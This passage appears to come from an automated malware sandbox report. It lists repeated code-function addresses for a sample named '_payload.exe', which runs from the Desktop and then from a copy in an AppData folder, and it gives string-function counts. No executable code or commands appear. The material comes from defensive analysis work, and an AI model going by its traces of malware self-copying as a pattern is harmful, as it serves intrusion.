              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F180302_2_00F18030
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F3F0102_2_00F3F010
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F121C02_2_00F121C0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F201602_2_00F20160
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00FD81132_2_00FD8113
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F5237E2_2_00F5237E
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00FD93432_2_00FD9343
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F444FF2_2_00F444FF
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F184C02_2_00F184C0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F154572_2_00F15457
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F154472_2_00F15447
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F5B5B12_2_00F5B5B1
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F595062_2_00F59506
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F196862_2_00F19686
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1A6602_2_00F1A660
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F5D7A12_2_00F5D7A1
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F187802_2_00F18780
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F127502_2_00F12750
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F167402_2_00F16740
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1A7102_2_00F1A710
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F168802_2_00F16880
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F3C8042_2_00F3C804
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F169F32_2_00F169F3
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F5D9DC2_2_00F5D9DC
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F59A712_2_00F59A71
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F12B802_2_00F12B80
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F16B802_2_00F16B80
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F53B402_2_00F53B40
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F19CF92_2_00F19CF9
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F5ACFF2_2_00F5ACFF
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F19DFA2_2_00F19DFA
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1BDC02_2_00F1BDC0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F37D6C2_2_00F37D6C
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1DD402_2_00F1DD40
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F16EE02_2_00F16EE0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F3CE512_2_00F3CE51
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F59FE32_2_00F59FE3
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F19F762_2_00F19F76
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F30F302_2_00F30F30
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F2E0033_2_00F2E003
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F1E6903_2_00F1E690
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0F7303_2_00F0F730
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F819203_2_00F81920
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F19F903_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F070E03_2_00F070E0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0C0703_2_00F0C070
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F050573_2_00F05057
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F080303_2_00F08030
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F2F0103_2_00F2F010
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F021C03_2_00F021C0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F101603_2_00F10160
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00FC81133_2_00FC8113
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0D2403_2_00F0D240
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F4237E3_2_00F4237E
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00FC93433_2_00FC9343
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F344FF3_2_00F344FF
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F084C03_2_00F084C0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F054573_2_00F05457
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F054473_2_00F05447
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F4B5B13_2_00F4B5B1
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F495063_2_00F49506
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F096863_2_00F09686
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0A6603_2_00F0A660
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F4D7A13_2_00F4D7A1
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F087803_2_00F08780
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F027503_2_00F02750
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F067403_2_00F06740
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0A7103_2_00F0A710
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F068803_2_00F06880
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F2C8043_2_00F2C804
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F069F33_2_00F069F3
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F4D9DC3_2_00F4D9DC
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F49A713_2_00F49A71
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F02B803_2_00F02B80
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F06B803_2_00F06B80
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F43B403_2_00F43B40
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F09CF93_2_00F09CF9
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F4ACFF3_2_00F4ACFF
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F09DFA3_2_00F09DFA
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0BDC03_2_00F0BDC0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F27D6C3_2_00F27D6C
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0DD403_2_00F0DD40
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F06EE03_2_00F06EE0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F2CE513_2_00F2CE51
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F49FE33_2_00F49FE3
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F09F763_2_00F09F76
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F20F303_2_00F20F30
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F19F904_2_00F19F90
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F070E04_2_00F070E0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0C0704_2_00F0C070
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F050574_2_00F05057
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F080304_2_00F08030
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F2F0104_2_00F2F010
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F2E0034_2_00F2E003
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F021C04_2_00F021C0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F101604_2_00F10160
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00FC81134_2_00FC8113
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0D2404_2_00F0D240
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F4237E4_2_00F4237E
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00FC93434_2_00FC9343
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F344FF4_2_00F344FF
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F084C04_2_00F084C0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F054574_2_00F05457
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F054474_2_00F05447
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F4B5B14_2_00F4B5B1
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F495064_2_00F49506
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F1E6904_2_00F1E690
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F096864_2_00F09686
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0A6604_2_00F0A660
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F4D7A14_2_00F4D7A1
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F087804_2_00F08780
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F027504_2_00F02750
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F067404_2_00F06740
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0F7304_2_00F0F730
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0A7104_2_00F0A710
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F068804_2_00F06880
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F2C8044_2_00F2C804
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F069F34_2_00F069F3
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F4D9DC4_2_00F4D9DC
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F819204_2_00F81920
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F49A714_2_00F49A71
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F02B804_2_00F02B80
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F06B804_2_00F06B80
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F43B404_2_00F43B40
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F09CF94_2_00F09CF9
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F4ACFF4_2_00F4ACFF
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F09DFA4_2_00F09DFA
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0BDC04_2_00F0BDC0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F27D6C4_2_00F27D6C
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0DD404_2_00F0DD40
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F06EE04_2_00F06EE0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F2CE514_2_00F2CE51
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F49FE34_2_00F49FE3
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F09F764_2_00F09F76
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F20F304_2_00F20F30
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F28520 appears 134 times
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F4F23E appears 108 times
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F28C81 appears 72 times
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F20EC2 appears 40 times
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F22587 appears 48 times
